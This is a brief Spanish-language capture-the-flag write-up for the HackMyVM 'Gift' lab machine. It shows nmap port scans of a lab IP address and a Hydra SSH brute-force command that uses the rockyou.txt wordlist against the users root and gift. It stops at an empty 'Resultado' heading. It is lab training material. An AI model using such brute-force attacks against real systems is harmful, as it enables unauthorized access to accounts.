HackMyVM - Máquina Gift
Enumeración
nmap -p- --open -sS --min-rate 5000 -n -Pn 192.168.195.129 -oG allPorts
nmap -sC -sV -p80,22 192.168.195.129 -oN targeted
En el escaneo más especifico solo vemos un puerto abierto:
22/tcp open ssh OpenSSH 8.3 (protocol 2.0)
80/tcp open http nginx
En el puerto 80 vemos que hay una web con el siguiente contenido:
Explotación
Como en la parte de la web no se encuentra nada, solo nos queda el servicio SSH, para lo que haremos fuerza bruta.
Creamos un diccionario de usuarios con dos usuarios: root y gift y para las contraseñas el mítico rockyou.txt
Para lanzar el ataque de fuerza bruta, usaré Hydra con el siguiente comando:
hydra -L users -P /usr/share/wordlists/rockyou.txt 192.168.195.129 ssh
Resultado:
